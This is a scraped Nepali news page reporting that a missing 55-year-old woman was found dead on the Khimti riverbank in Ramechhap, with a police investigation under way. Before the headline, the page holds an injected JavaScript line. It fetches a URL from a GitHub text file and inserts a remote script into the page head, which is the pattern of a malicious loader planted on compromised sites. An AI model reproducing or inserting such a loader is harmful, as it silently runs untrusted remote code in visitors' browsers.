;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा हराइ रहेकी ठुलीकान्छी मृत भेटीइन – जुनेली न्युज
शनिबार, असार २९, २०८२
  • होमपेज
  • रामेछापमा हराइ रहेकी ठुलीकान्छी मृत भेटीइन
जुनेली बिशेष

रामेछापमा हराइ रहेकी ठुलीकान्छी मृत भेटीइन

जुनेली न्युज, रामेछाप |  हराइ रहेकी चुचुरेकी ठुलीकान्छी भेइन् साउन १९, रामेछाप जिल्लाकाे गोकुलगंगा गाँउपालिका वडा नं १ चुचुरेकि बेपत्ता भएकी महिला मृत अवस्थामा भेटिएकी छन् । मृतभेटिनेमा स्थानीय बालकृष्ण गुभाजुको श्रीमती अन्दाजी ५५ की ठुलोकान्छी गुभाजु हुन् ।

उनी घरबाट हराई बेपत्ता भएकोमा थिइन् । उनकाे शव अाइतबार गोकुलगंगा गाँउपालिका वडा नं ३ धारापानी स्थित खिम्ती खोलाको किनारमा फेला परेको प्रहरी चाैकी ठाेसेलाई उदृत गर्दै रामेछाप प्रहरीले जानकारी दिएकाे छ । प्रहरीले घटना बारे थप अनुसन्धान गरिएको जनाएको छ ।

फेसबुक प्रतिक्रियाहरु